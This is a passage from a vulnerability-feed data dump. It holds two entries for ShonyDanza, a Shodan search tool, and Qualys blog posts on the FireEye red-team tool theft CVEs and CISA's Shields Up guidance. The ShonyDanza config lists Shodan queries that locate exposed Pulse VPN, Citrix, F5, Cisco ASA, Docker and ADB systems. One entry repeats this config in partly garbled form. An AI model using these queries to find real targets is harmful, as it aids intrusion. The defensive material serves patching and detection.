search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:24", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n\ndictionary below to add it to your shonydanza stock searches menu #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) STOCK_SEARCHES = { 'ANONYMOUS_FTP':'ftp anonymous ok', 'RDP':'port:3389 has_screenshot:true', 'OPEN_TELNET':'port:23 [console](<https://www.kitploit.com/search/label/Console> \"console\" ) [gateway](<https://www.kitploit.com/search/label/Gateway> \"gateway\" ) -password', 'APACHE_DIR_LIST':'http.title:\"Index of /\"', 'SPRING_BOOT':'http.favicon.hash:116323821', 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', 'DOCKER_API':'\"Docker Containers:\" port:2375', 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' } #OPTIONAL #IP or cidr range constraint for searches that return list of IP addresses #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) #NET_RANGE = '0.0.0.0/0' \">\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest 